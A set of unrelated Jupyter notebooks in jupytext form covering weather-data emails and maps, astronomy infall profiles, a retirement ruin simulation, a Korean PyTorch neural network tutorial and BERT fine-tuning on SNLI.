src=link_image style="width:640px; height:360px;" /><br> [Open dynamic chart](link_html)<br> Have a nice day. <br> PS: You can [send the email again](link_webhook) if you need a fresh update.<br> <div><strong>Full Name</strong></div> <div>Open source lover | <a href="http://www.naas.ai/" target="_blank">Naas</a></div> # + [markdown] papermill={} tags=[] # ### Add email template as a dependency # + papermill={} tags=[] naas.dependency.add("message.md") # + [markdown] papermill={} tags=[] # ## Model # + [markdown] papermill={} tags=[] # ### Get the data from open weather map # + [markdown] papermill={} tags=[] # The historical open weather api need the latitude, longitude in order to have the data # + papermill={} tags=[] def get_geoloc(city: str, country_code: str = ''): """ Get the geoloc of a city, country :param city: name of the city :type city: str :param country_code: Please use ISO 3166 country codes, default to '' :type country_code: str """ url = f'http://api.openweathermap.org/geo/1.0/direct?q={city},,{country_code}&appid={OPENWEATHER_KEY}' return requests.get(url).json() def get_lat_lon(city: str, country_code: str = ''): """ Get the geoloc of a city, country :param city: name of the city :type city: str :param country_code: Please use ISO 3166 country codes, default to '' :type country_code: str """ geoloc = get_geoloc(city, country_code) if len(geoloc) == 0: return None, None return geoloc[0]['lat'], geoloc[0]['lon'] # get_lat_lon('paris') # get_lat_lon('paris', 'us') # + papermill={} tags=[] def get_historical_weather(city: str, country_code: str = '', nbr_days_before_now: int = 0): """Get historical weather data. For free API, maximum history is 5 days before now :param city: name of the city :type city: str :param country_code: Please use ISO 3166 country codes, default to '' :type country_code: str :param nbr_hours_before_now: number of hour before now """ unix_dt = int(time.time() - 60 * 60 * 24 * nbr_days_before_now) lat, lon = get_lat_lon(city, country_code) if lat is None: return None url = f'https://api.openweathermap.org/data/2.5/onecall/timemachine?lat={lat}&lon={lon}&dt={unix_dt}&appid={OPENWEATHER_KEY}&units=metric' return requests.get(url).json() def weather_data_to_df(city: str, country_code: str = '', nbr_days_before_now: int = 0) -> pd.DataFrame: data = get_historical_weather(city, country_code, nbr_days_before_now) df = pd.DataFrame(data['hourly']) df['date_time'] = pd.to_datetime(df['dt'], unit='s') df['city'] = city df['country_code'] = country_code df_explode_weather = pd.concat([df.drop(['weather', 'dt'], axis=1), df['weather'].str[0].apply(pd.Series)], axis=1) # df_explode_weather.set_index('date_time', inplace=True) return df_explode_weather # + papermill={} tags=[] df_histo_weather = pd.concat([weather_data_to_df(city, country_code, _) for _ in range(6)], ignore_index=True) df_histo_weather = df_histo_weather.sort_values(by='date_time').reset_index(drop=True).rename(columns={"date_time": "Date"}) df_histo_weather # + [markdown] papermill={} tags=[] # ### Add prediction column # + papermill={} tags=[] df_predict = prediction.get(dataset=df_histo_weather, date_column='Date', column="temp", data_points=5, prediction_type="all") df_predict # + [markdown] papermill={} tags=[] # ### Build chart # + papermill={} tags=[] chart = plotly.linechart(df_predict, x='Date', y=['temp', 'ARIMA', "LINEAR", "SVR", "COMPOUND"], showlegend=True, title=f'Temp in {city} last 5 days') # + [markdown] papermill={} tags=[] # ## Output # + [markdown] papermill={} tags=[] # ### Save as html and png # + papermill={} tags=[] chart.write_html(output_html) chart.write_image(output_image, width=1200) # + [markdown] papermill={} tags=[] # ### Expose chart # + papermill={} tags=[] link_image = naas.asset.add(output_image) link_html = naas.asset.add(output_html, {'inline': True}) # + [markdown] papermill={} tags=[] # ### Add webhook to run your notebook again # + papermill={} tags=[] link_webhook = naas.webhook.add() # + [markdown] papermill={} tags=[] # ### Create email content # + papermill={} tags=[] markdown_file = "message.md" content = open(markdown_file, "r").read() md = markdown2.markdown(content) md # + papermill={} tags=[] post = md.replace("DATANOW", str(DATANOW)) post = post.replace("CITY", str(city)) post = post.replace("LINEAR", str(LINEAR)) post = post.replace("link_image", str(link_image)) post = post.replace("link_html", str(link_html)) post = post.replace("link_webhook", str(link_webhook)) post # + [markdown] papermill={} tags=[] # ### Send email # + papermill={} tags=[] content = post naas.notification.send(email_to=email_to, subject=subject, html=content, files=files, email_from=email_from)
OpenWeatherMap/OpenWeatherMap_Send_daily_email_with_predictions.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # ## Introduction to the Interstellar Medium # ### <NAME> # ### Figures 9.5 and 9.6: two layer infall profiles import numpy as np import matplotlib.pyplot as plt from astropy import units as u from astropy import constants as c # %matplotlib inline # blackbody profile # could also just call astropy but this is shorter... def Bnu(nu,T): return(2*c.h*nu**3 / c.c**2 * (np.exp(c.h*nu/(c.k_B*T)) - 1)**-1) # the two-layer model def Inu(nu0, v, v_in, sigma, T_b, tau_b, T_f, tau_f): nu = nu0 * (1 - v / 2.9978e5) tau_nub = tau_b / np.exp(v**2/(2*sigma**2)) tau_nuf = tau_f / np.exp((v-v_in)**2/(2*sigma**2)) Inu = Bnu(nu, T_b) * (1 - np.exp(-tau_nub)) * np.exp(-tau_nuf) + Bnu(nu, T_f) * (1 - np.exp(-tau_nuf)) return(Inu) def plot_profile1(): Tk = 10 * u.K a = np.sqrt(c.k_B * Tk / (2*c.m_p)) # thermal sigma = 0.3 # turbulent vmax = 1.6 dv = 0.025 v = np.arange(-vmax, vmax+dv, dv) T_f = 5 * u.K T_b = 20 * u.K tau_f = 1 tau_b = 2 v_in = 0.1 # aperture r = 10 # beam FWHM arcsec Omega = 2*np.pi*(r/2.355)**2*2.35e-11 # steradians #nu0 = 345.796e9 * u.Hz # CO 3-2 #nu0 = 115.271e9 * u.Hz # CO 1-0 nu0 = 97.981e9 * u.Hz # CS 2-1 #Fnu = Inu(nu0, v, v_in, sigma, T_b, tau_b, T_f, tau_f) * Omega * 1e26 # Jy #TB = c.c**2 * Inu / (2*c.k_B*nu0**2) # K fig = plt.figure(figsize=(6,4)) ax = fig.add_subplot(111) #ax.set_xlim(-2.3, 2.3) ax.set_xlim(-1.75, 1.75) ax.set_ylim(-1.0, 12) ax.set_xlabel(r'${\rm Velocity}\ {\rm (km/s)}$', fontsize=14) ax.set_ylabel(r'$F_\nu\ {\rm (Jy)}$', fontsize=14) tau_b = 2 Fnu = Inu(nu0, v, 0.1, sigma, T_b, tau_b, T_f, 0.1) * Omega * 1e26 ax.plot(v, Fnu, color='black', lw=2, ls='-', alpha=0.2, label='0.1') Fnu = Inu(nu0, v, 0.1, sigma, T_b, tau_b, T_f, 0.5) * Omega * 1e26 ax.plot(v, Fnu, color='black', lw=2.3, ls='-', alpha=0.4, label='0.5') Fnu = Inu(nu0, v, 0.1, sigma, T_b, tau_b, T_f, 2) * Omega * 1e26 ax.plot(v, Fnu, color='black', lw=2.6, ls='-', alpha=1, label='2.0') ax.legend(loc=1, title=r'$\tau_{\rm f0}$') ax.text(0.05, 0.87, r'$v_{\rm in} = 0.1\,{\rm km/s}$', fontsize=12, transform=ax.transAxes) fig.tight_layout(rect=[0.0,0.0,1.0,1.0]) plt.savefig('infall1.pdf') def plot_profile2(): Tk = 10 * u.K a = np.sqrt(c.k_B * Tk / (2*c.m_p)) # thermal sigma = 0.3 # turbulent vmax = 1.6 dv = 0.025 v = np.arange(-vmax, vmax+dv, dv) T_f = 5 * u.K T_b = 20 * u.K tau_f = 1.5 tau_b = 2 v_in = 0.1 # aperture r = 10 # beam FWHM arcsec Omega = 2*np.pi*(r/2.355)**2*2.35e-11 # steradians #nu0 = 345.796e9 * u.Hz # CO 3-2 #nu0 = 115.271e9 * u.Hz # CO 1-0 nu0 = 97.981e9 * u.Hz # CS 2-1 fig = plt.figure(figsize=(8,5)) ax1 = fig.add_subplot(121) ax1.set_xlim(-1.75, 1.75) ax1.set_ylim(-0.5, 8.0) ax1.set_xlabel(r'${\rm Velocity}\ {\rm (km/s)}$', fontsize=14) ax1.set_ylabel(r'$F_\nu\ {\rm (Jy)}$', fontsize=14) Fnu = Inu(nu0, v, 0.0, sigma, T_b, tau_b, T_f, tau_f) * Omega * 1e26 ax1.plot(v, Fnu, color='black', lw=2, ls='-', alpha=1, label='0') Fnu = Inu(nu0, v, 0.1, sigma, T_b, tau_b, T_f, tau_f) * Omega * 1e26 ax1.plot(v, Fnu, color='black', lw=2, ls='-', alpha=0.4, label='0.1') Fnu = Inu(nu0, v, 0.2, sigma, T_b, tau_b, T_f, tau_f) * Omega * 1e26 ax1.plot(v, Fnu, color='black', lw=2, ls='-', alpha=0.2, label='0.2') ax1.legend(loc=1, title=r'$v_{\rm in}$') ax1.text(0.06, 0.92, 'Collapsing', fontsize=13, transform=ax1.transAxes) #ax1.text(0.06, 0.87, r'$\tau_{\rm b} = 2$', fontsize=11, transform=ax1.transAxes) ax1.text(0.06, 0.87, r'$\tau_{\rm f0} = 1$', fontsize=11, transform=ax1.transAxes) ax2 = fig.add_subplot(122) ax2.set_xlim(-1.75, 1.75) ax2.set_ylim(-0.5, 8.0) ax2.set_yticklabels([]) plt.setp(ax2.get_yticklabels(), visible=True) ax2.set_xlabel(r'${\rm Velocity}\ {\rm (km/s)}$', fontsize=14) Fnu = Inu(nu0, v, 0.0, sigma, T_b, tau_b, T_f, tau_f) * Omega * 1e26 ax2.plot(v, Fnu, color='black', lw=2, ls='-', alpha=1, label='0') Fnu = Inu(nu0, v, -0.1, sigma, T_b, tau_b, T_f, tau_f) * Omega * 1e26 ax2.plot(v, Fnu, color='black', lw=2, ls='-', alpha=0.4, label='-0.1') Fnu = Inu(nu0, v, -0.2, sigma, T_b, tau_b, T_f, tau_f) * Omega * 1e26 ax2.plot(v, Fnu, color='black', lw=2, ls='-', alpha=0.2, label='-0.2') ax2.legend(loc=1, title=r'$v_{\rm in}$') ax2.text(0.06, 0.92, 'Expanding', fontsize=13, transform=ax2.transAxes) #ax2.text(0.06, 0.87, r'$\tau_{\rm b} = 2$', fontsize=11, transform=ax2.transAxes) ax2.text(0.06, 0.87, r'$\tau_{\rm f0} = 1$', fontsize=11, transform=ax2.transAxes) fig.tight_layout(rect=[0.0,0.0,1.0,1.0]) plt.savefig('infall2.pdf') # Figure 9.5 plot_profile1() # Figure 9.6 plot_profile2()
star_formation/infall.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + # %matplotlib inline from pprint import pprint from matplotlib import pyplot as plt import itertools import pandas import seaborn import numpy import market import simulate import harvesting import withdrawal import metrics import montecarlo import mortality # - seaborn.set(style="whitegrid") seaborn.set_context('poster') Market = market.Returns_US_1871() def get_rq(stock_pct, age, withdrawal_pct): # I can't figure out how to to joint life expectancy so I'll # just use female life expectancy for now :/ life_expectancy = mortality.life_expectancy(None, age) mean = montecarlo.simba_mean[stock_pct] stddev = montecarlo.simba_stddev[stock_pct] return metrics.probability_of_ruin(mean, stddev, life_expectancy, float(withdrawal_pct)) df = pandas.DataFrame(index=numpy.arange(1,26)) for year in range(1871, 2019 - 30 + 1): s = simulate.withdrawals(Market.iter_from(year), years=25, harvesting=harvesting.N_60_RebalanceHarvesting, withdraw=withdrawal.ConstantDollar) r_series = [] for (i, age) in zip(s, itertools.count(start=65)): r = get_rq(60, age, i.withdraw_n/i.portfolio_pre.value_n) r_series.append(r) df[year] = r_series df.head() plt.figure(figsize=(11,9)) df.max().plot() plt.figure(figsize=(11,9)) df[1960].plot()
Sleep Well At Night Redux.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 2 # language: python # name: python2 # --- # # Interactively rendering weather maps from the KNMI database # *<NAME>, March 2016* # # In the process of analysing any kind of meteorological data, it is important to comprehend the synoptic situation, *the bigger picture*. Therefore, I often visit the KNMI database to view weathermaps, but to get to the desired map requires an unpleasant and time consuming amount of mouse clicks. Therefore, I developed a small script that is able to automatically find the correct weather map given a date and time, and to visualize it immediately in the Jupyter notebook. # # ##### Note! # *Unfortunately, the widgets are not visible when the notebook is viewed outside ipython. As far as I know, this is currently not possible. If anyone knows how to do it, please let me know.* # ## Accessing and displaying the weather maps # Every weather map is stored in the KNMI database with a standard format, e.g.: # http://cdn.knmi.nl/knmi/map/page/klimatologie/daggegevens/weerkaarten/analyse_2012052812.gif. # There are several ways to load such a figure in the notebook, the most simple solution is # # # # # + # Required package from IPython.display import Image weblink = 'http://cdn.knmi.nl/knmi/map/page/klimatologie/daggegevens/weerkaarten/analyse_2012052812.gif' Image(url=weblink) # - # That's a good start. The next step is to automatically generate the correct url, given any date and time. # + # Required package from datetime import datetime, timedelta def find_weathermap(timestamp): ''' Given a datetime object, find the url corresponding to the closest operation analysis map on the KNMI database''' # First, find the time corresponding to the nearest operational analysis nearest_6hour = round((timestamp.hour+timestamp.minute/60.)/6)*6 # yields either 0, 6, 12, 18 or 24(!) nearest_analysis = datetime(timestamp.year,timestamp.month,timestamp.day) + timedelta(hours=nearest_6hour) print 'The nearest operational analysis time is',nearest_analysis # Then, convert the datetime object to a string timestring = nearest_analysis.strftime('%Y%m%d%H') print 'As a string, this looks like', timestring # Finally, embed the string in the url url = 'http://cdn.knmi.nl/knmi/map/page/klimatologie/daggegevens/weerkaarten/analyse_'+timestring+'.gif' print 'The corresponding map:',url return url # Demonstration x = datetime.now() weblink = find_weathermap(x) # - # This result can be plotted, but only if the current 'nearest weather map' is already there. # ## Adding interactivity # This demonstrates how weathermaps can be viewed interactively with the help of widgets. First, I will let the user choose some dates. Then, I will use a slider to visualize weather maps in a 'loop'. # + # Required package from IPython.display import Image, display from IPython.html.widgets import interact,fixed from datetime import datetime, timedelta # We use the function as above, but without the print statements def find_weathermap(timestamp): ''' Given a datetime object, find the url corresponding to the closest operation analysis map on the KNMI database''' # First, find the time corresponding to the nearest operational analysis nearest_6hour = round((timestamp.hour+timestamp.minute/60.)/6)*6 # yields either 0, 6, 12, 18 or 24(!) nearest_analysis = datetime(timestamp.year,timestamp.month,timestamp.day) + timedelta(hours=nearest_6hour) # Then, convert the datetime object to a string timestring = nearest_analysis.strftime('%Y%m%d%H') # Finally, embed the string in the url url = 'http://cdn.knmi.nl/knmi/map/page/klimatologie/daggegevens/weerkaarten/analyse_'+timestring+'.gif' return url # Then, a function to show the weather maps interactively: def view_map(year=2010,month=1,day=1,hour=0,minute=0): ''' View weather maps from KNMI database for a given date and time ''' # First the input needs to be converted to a datetime object hour = int(hour) # because I will use a float text box below timestamp = datetime(year,month,day,hour,minute) # Then, find the corresponding url weblink = find_weathermap(timestamp) # Finally, visualise the map a = Image(url=weblink) # somehow, using Image() directly display(a) # does not work inside a function return interact(view_map, year = ({'2010':2010,'2011':2011,'2012':2012}), month = ({'January':1,'February':2,'March':3,'April':4}), day = (0,31), hour = ('0'), minute = fixed(0)) # - # This script is not fool-proof yet. For example, it will give errors for 31st of February. Also, I have not included all months in the dropdown menu, etc. This is just intended as a matter of demonstration. In most cases, the datetime object will be part of my (time series) data, and interaction won't be necessary. This is just to check that it works. # The best tutorial for widgets that I could find: # http://nbviewer.jupyter.org/github/quantopian/ipython/blob/master/examples/Interactive%20Widgets/Using%20Interact.ipynb # + # To embed the weather map in a matplotlib subplot: import io from PIL import Image from urllib2 import urlopen url = 'http://cdn.knmi.nl/knmi/map/page/klimatologie/daggegevens/weerkaarten/analyse_2012031700.gif' image_bytes = urlopen(url).read() # internal data file data_stream = io.BytesIO(image_bytes) # open as a PIL image object pil_image = Image.open(data_stream) import matplotlib.pyplot as plt # %matplotlib inline f,ax = plt.subplots(1,2,figsize=(16,8)) ax[1].imshow(pil_image)
wheather_maps.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # %matplotlib inline # # 신경망(Neural Networks) # ======================= # # 신경망은 ``torch.nn`` 패키지를 사용하여 생성할 수 있습니다. # # 지금까지 ``autograd`` 를 살펴봤는데요, ``nn`` 은 모델을 정의하고 미분하는데 # ``autograd`` 를 사용합니다. # ``nn.Module`` 은 계층(layer)과 ``output`` 을 반환하는 ``forward(input)`` # 메서드를 포함하고 있습니다. # # 숫자 이미지를 분류하는 신경망을 예제로 살펴보겠습니다: # # .. figure:: /_static/img/mnist.png # :alt: convnet # # convnet # # 이는 간단한 순전파 네트워크(Feed-forward network)입니다. 입력(input)을 받아 # 여러 계층에 차례로 전달한 후, 최종 출력(output)을 제공합니다. # # 신경망의 일반적인 학습 과정은 다음과 같습니다: # # - 학습 가능한 매개변수(또는 가중치(weight))를 갖는 신경망을 정의합니다. # - 데이터셋(dataset) 입력을 반복합니다. # - 입력을 신경망에서 전파(process)합니다. # - 손실(loss; 출력이 정답으로부터 얼마나 떨어져있는지)을 계산합니다. # - 변화도(gradient)를 신경망의 매개변수들에 역으로 전파합니다. # - 신경망의 가중치를 갱신합니다. 일반적으로 다음과 같은 간단한 규칙을 사용합니다: # ``가중치(wiehgt) = 가중치(weight) - 학습율(learning rate) * 변화도(gradient)`` # # 신경망 정의하기 # ------------------ # # 이제 신경망을 정의해보겠습니다: # # # + import torch import torch.nn as nn import torch.nn.functional as F class Net(nn.Module): def __init__(self): super(Net, self).__init__() # 1 input image channel, 6 output channels, 3x3 square convolution # kernel self.conv1 = nn.Conv2d(1, 6, 3) self.conv2 = nn.Conv2d(6, 16, 3) # an affine operation: y = Wx + b self.fc1 = nn.Linear(16 * 6 * 6, 120) # 6*6 from image dimension self.fc2 = nn.Linear(120, 84) self.fc3 = nn.Linear(84, 10) def forward(self, x): # Max pooling over a (2, 2) window x = F.max_pool2d(F.relu(self.conv1(x)), (2, 2)) # If the size is a square you can only specify a single number x = F.max_pool2d(F.relu(self.conv2(x)), 2) x = x.view(-1, self.num_flat_features(x)) x = F.relu(self.fc1(x)) x = F.relu(self.fc2(x)) x = self.fc3(x) return x def num_flat_features(self, x): size = x.size()[1:] # all dimensions except the batch dimension num_features = 1 for s in size: num_features *= s return num_features net = Net() print(net) # - # ``forward`` 함수만 정의하고 나면, (변화도를 계산하는) ``backward`` 함수는 # ``autograd`` 를 사용하여 자동으로 정의됩니다. # ``forward`` 함수에서는 어떠한 Tensor 연산을 사용해도 됩니다. # # 모델의 학습 가능한 매개변수들은 ``net.parameters()`` 에 의해 반환됩니다. # # params = list(net.parameters()) print(len(params)) print(params[0].size()) # conv1's .weight # 임의의 32x32 입력값을 넣어보겠습니다. # # Note: 이 신경망(LeNet)의 예상되는 입력 크기는 32x32입니다. 이 신경망에 MNIST # 데이터셋을 사용하기 위해서는, 데이터셋의 이미지 크기를 32x32로 변경해야 합니다. # # input = torch.randn(1, 1, 32, 32) out = net(input) print(out) # 모든 매개변수의 변화도 버퍼(gradient buffer)를 0으로 설정하고, 무작위 값으로 # 역전파를 합니다: # # net.zero_grad() out.backward(torch.randn(1, 10)) # <div class="alert alert-info"><h4>Note</h4><p>``torch.nn`` 은 미니-배치(mini-batch)만 지원합니다. ``torch.nn`` 패키지 # 전체는 하나의 샘플이 아닌, 샘플들의 미니-배치만을 입력으로 받습니다. # # 예를 들어, ``nnConv2D`` 는 ``nSamples x nChannels x Height x Width`` 의 # 4차원 Tensor를 입력으로 합니다. # # 만약 하나의 샘플만 있다면, ``input.unsqueeze(0)`` 을 사용해서 가짜 차원을 # 추가합니다.</p></div> # # 계속 진행하기 전에, 지금까지 살펴봤던 것들을 다시 한번 요약해보겠습니다. # # **요약:** # - ``torch.Tensor`` - ``backward()`` 같은 autograd 연산을 지원하는 # *다차원 배열* 입니다. 또한 tensor에 대한 *변화도(gradient)를 갖고* 있습니다. # - ``nn.Module`` - 신경망 모듈. *매개변수를 캡슐화(encapsulation)하는 간편한 # 방법* 으로, GPU로 이동, 내보내기(exporting), 불러오기(loading) 등의 작업을 # 위한 헬퍼(helper)를 제공합니다. # - ``nn.Parameter`` - Tensor의 한 종류로, ``Module`` *에 속성으로 할당될 때 # 자동으로 매개변수로 등록* 됩니다. # - ``autograd.Function`` - *autograd 연산의 전방향과 역방향 정의* 를 구현합니다. # 모든 ``Tensor`` 연산은 하나 이상의 ``Function`` 노드를 생성하며, 각 노드는 # ``Tensor`` 를 생성하고 *이력(history)을 부호화* 하는 함수들과 연결하고 있습니다. # # **지금까지 우리가 다룬 내용은 다음과 같습니다:** # - 신경망을 정의하는 것 # - 입력을 처리하고 ``backward`` 를 호출하는 것 # # **더 살펴볼 내용들은 다음과 같습니다:** # - 손실을 계산하는 것 # - 신경망의 가중치를 갱신하는 것 # # 손실 함수 (Loss Function) # ------------------------- # 손실 함수는 (output, target)을 한 쌍(pair)의 입력으로 받아, 출력(output)이 # 정답(target)으로부터 얼마나 멀리 떨어져있는지 추정하는 값을 계산합니다. # # nn 패키지에는 여러가지의 `손실 함수들 <http://pytorch.org/docs/nn.html#loss-functions>`_ # 이 존재합니다. # 간단한 손실 함수로는 출력과 대상간의 평균제곱오차(mean-squared error)를 계산하는 # ``nn.MSEloss`` 가 있습니다. # # 예를 들면: # # # + output = net(input) target = torch.randn(10) # a dummy target, for example target = target.view(1, -1) # make it the same shape as output criterion = nn.MSELoss() loss = criterion(output, target) print(loss) # - # 이제 ``.grad_fn`` 속성을 사용하여 ``loss`` 를 역방향에서 따라가다보면, # 이러한 모습의 연산 그래프를 볼 수 있습니다: # # :: # # input -> conv2d -> relu -> maxpool2d -> conv2d -> relu -> maxpool2d # -> view -> linear -> relu -> linear -> relu -> linear # -> MSELoss # -> loss # # 따라서 ``loss.backward()`` 를 실행할 때, 전체 그래프는 손실(loss)에 대하여 # 미분되며, 그래프 내의 ``requires_grad=True`` 인 모든 Tensor는 변화도(gradient)가 # 누적된 ``.grad`` Tensor를 갖게 됩니다. # # 설명을 위해, 역전파의 몇 단계를 따라가보겠습니다: # # print(loss.grad_fn) # MSELoss print(loss.grad_fn.next_functions[0][0]) # Linear print(loss.grad_fn.next_functions[0][0].next_functions[0][0]) # ReLU # 역전파(Backprop) # ---------------- # 오차(error)를 역전파하기 위해서는 ``loss.backward()`` 만 해주면 됩니다. # 기존 변화도를 없애는 작업이 필요한데, 그렇지 않으면 변화도가 기존의 것에 # 누적되기 때문입니다. # # # 이제 ``loss.backward()`` 를 호출하여 역전파 전과 후에 conv1의 bias gradient를 # 살펴보겠습니다. # # # + net.zero_grad() # zeroes the gradient buffers of all parameters print('conv1.bias.grad before backward') print(net.conv1.bias.grad) loss.backward() print('conv1.bias.grad after backward') print(net.conv1.bias.grad) # - # 지금까지 손실 함수를 어떻게 사용하는지를 살펴봤습니다. # # **더 읽어보기:** # # 신경망 패키지(nn package)에는 심층 신경망(deep neural network)을 구성하는 # 다양한 모듈과 손실 함수가 포함되어 있습니다. # 전체 목록은 `이 문서 <http://pytorch.org/docs/nn>`_ 에 있습니다. # # **이제 더 살펴볼 내용은 다음과 같습니다:** # # - 신경망의 가중치를 갱신하는 것 # # 가중치 갱신 # ------------------ # 실제로 많이 사용되는 가장 단순한 갱신 규칙은 확률적 경사하강법(SGD; Stochastic # Gradient Descent)입니다: # # ``가중치(wiehgt) = 가중치(weight) - 학습율(learning rate) * 변화도(gradient)`` # # 간단한 Python 코드로 이를 구현해볼 수 있습니다: # # .. code:: python # # learning_rate = 0.01 # for f in net.parameters(): # f.data.sub_(f.grad.data * learning_rate) # # 신경망을 구성할 때 SGD, Nesterov-SGD, Adam, RMSProp 등과 같은 다양한 갱신 규칙을 # 사용하고 싶을 수 있습니다. 이를 위해서 ``torch.optim`` 라는 작은 패키지에 이러한 # 방법들을 모두 구현해두었습니다. 사용법은 매우 간단합니다: # # # + import torch.optim as optim # Optimizer를 생성합니다. optimizer = optim.SGD(net.parameters(), lr=0.01) # 학습 과정(training loop)에서는 다음과 같습니다: optimizer.zero_grad() # zero the gradient buffers output = net(input) loss = criterion(output, target) loss.backward() optimizer.step() # Does the update # - # .. Note:: # # ``optimizer.zero_grad()`` 를 사용하여 수동으로 변화도 버퍼를 0으로 설정하는 # 것에 유의하세요. 이는 `역전파(Backprop)`_ 섹션에서 설명한 것처럼 변화도가 # 누적되기 때문입니다. # #
docs/_downloads/c029676472d90691aa145c6fb97a61c3/neural_networks_tutorial.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # name: python3 # --- # + id="1PWRp6JI3U45" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 870} outputId="1182375b-7889-4283-db5a-700b851e5141" import numpy as np import pandas as pd import torch import torch.nn as nn import torch.nn.functional as F from torch.utils.data import TensorDataset, DataLoader from torch.utils.data import RandomSampler, SequentialSampler # !pip install transformers # !pip install wget # !pip install jsonlines import transformers from transformers import BertTokenizer from transformers import BertForSequenceClassification, AdamW, BertConfig from keras.preprocessing.sequence import pad_sequences from sklearn.model_selection import train_test_split import wget import json import jsonlines import os # + id="jHnvOe9U4v8v" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="bf594415-da21-4d57-e49d-099a27d29b04" ######### Setting GPU device ######### if torch.cuda.is_available(): device = torch.device('cuda') else: device = torch.device('cpu') print(device) # + id="S54BrfEB3nIh" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 306} outputId="9ba3589f-eec0-4cd0-94ee-aae763d96487" ########## Download SNLI dataset ############ snli_url = "https://nlp.stanford.edu/projects/snli/snli_1.0.zip" if not os.path.exists('./snli_1.0.zip'): wget.download(snli_url, './snli_1.0.zip') # Unzip the dataset if not os.path.exists('./snli_1.0/'): # !unzip snli_1.0.zip def processed_snli_data(path): hyp_prem = [] labels = [] with jsonlines.open(path, "r") as f: for line in f.iter(): json_string = json.dumps(line) ex = json.loads(json_string) if ex['gold_label'] != "-": hyp_prem.append(ex['sentence1'] + " " + ex['sentence2']) labels.append(ex['gold_label']) # hyp_prem = hyp_prem[:160000] # labels = labels[:160000] tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True) print(hyp_prem[0]) print(tokenizer.tokenize(hyp_prem[0])) sent = [] for sentence in hyp_prem: s = tokenizer.encode(sentence, add_special_tokens=True) sent.append(s) print(sent[0]) return sent, labels def snli_dataloader(sentence, lab, turn): max_len = 112 labels = [] for y in lab: if y == 'neutral': labels.append(0) elif y == 'entailment': labels.append(1) elif y == 'contradiction': labels.append(2) sentence = pad_sequences(sentence, maxlen=max_len, dtype="long", value=0, truncating="post", padding="post") print(sentence[0]) mask = [] for s in sentence: m = [int(word_id > 0) for word_id in s] mask.append(m) print(mask[2]) # contains 1 for original words, 0 for padded words test_size = 0.1 if turn == "train" else 0.01 train_set, test_set, train_labels, test_labels = train_test_split( sentence, labels, random_state=2018, test_size=test_size ) train_mask, test_mask, _, _ = train_test_split(mask, labels, random_state=2018, test_size=test_size) print("train set size",len(train_set), len(train_labels)) # 0.6 times original num of sentences print("test set size", len(test_set)) # 0.4 times original num of sentences print() ######## convert NumPy arrays to Tensor data ######## print(train_set.shape) print(train_labels[:10]) train_labels = np.array(train_labels) test_labels = np.array(test_labels) train_set = torch.tensor(train_set) test_set = torch.tensor(test_set) train_labels = torch.tensor(train_labels) test_labels = torch.tensor(test_labels) train_mask = torch.tensor(train_mask) test_mask = torch.tensor(test_mask) print("train data shape", train_set.shape) print("test data shape", train_labels.shape) print("train mask shape", train_mask.shape) ####### Dataloader to load train and test data in batches ######## batch_size = 32 # Recommended in paper train = TensorDataset(train_set, train_mask, train_labels) sampler = RandomSampler(train) train_loader = DataLoader(train, batch_size=batch_size, sampler=sampler) test = TensorDataset(test_set, test_mask, test_labels) samp = RandomSampler(test) test_loader = DataLoader(test, batch_size=batch_size, sampler=samp) return train_loader, test_loader # + id="Ny_oP1OR4KgE" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 494, "referenced_widgets": ["c47a436a2c564f4a81249485e50fed6e", "ca6e7874d6cb44508070e46509295006", "c479c0d3d51344c8b7ca1b1f9944f3a6", "a3512677775b4fe084694d72c3b8770d", "6560efb5ab3a491891f28534e0bfaa81", "f65e637b4d9141c09726a60d6dcc2be5", "22262866fae348bbb26cd12cb322897f", "093981eb84e846a0991c35e04d27babb"]} outputId="594ea371-1046-40e0-bcd5-5354ebbc62c7" train_sent, labels = processed_snli_data("./snli_1.0/snli_1.0_train.jsonl") print(len(train_sent)) print('Max sentence length: ', max([len(sen) for sen in train_sent])) snli_trainloader, _ = snli_dataloader(train_sent, labels, "train") # + id="mmRc_rBp4m3x" colab_type="code" colab={} ####### define the model ########### bert_model = BertForSequenceClassification.from_pretrained( "bert-base-uncased", num_labels=2, output_attentions = False, output_hidden_states = False, ) bert_model = bert_model.to(device) # + id="vswLPN2D49RA" colab_type="code" colab={} ######## define optimizer, write accuracy fn ########### optimizer = AdamW(bert_model.parameters(), lr=2e-5, eps=1e-8) num_epochs = 4 loss_arr = [] def compute_accuracy(preds, targets): return (torch.argmax(preds, dim=1) == targets).float().mean().item() # + id="L6SYEVyj5Dmw" colab_type="code" colab={} ############### TRAINING OF BERT MODEL ################## for ep in range(num_epochs): bert_model.train() epoch_loss = 0 for i, data in enumerate(snli_trainloader): batch_data = data[0].to(device).long() batch_mask = data[1].to(device).long() batch_labels = data[2].to(device).long() bert_model.zero_grad() pred = bert_model(batch_data, token_type_ids=None, attention_mask=batch_mask, labels=batch_labels) # As we call the model with labels, it returns the loss in a tuple loss = pred[0] epoch_loss += loss.item() loss.backward() # Backprpagation # Clip Gradient norm to mitigate exploding of gradients torch.nn.utils.clip_grad_norm_(bert_model.parameters(), 1.0) optimizer.step() epoch_loss /= len(snli_trainloader) print("train loss after %d epochs is %f " %(ep+1, epoch_loss)) loss_arr.append(epoch_loss) # + id="gzk21awU5aAb" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 462} outputId="6821a0d4-92e0-403a-b681-9422d23cceec" ############## Load test data #################### test_sent, labels = processed_snli_data("./snli_1.0/snli_1.0_test.jsonl") 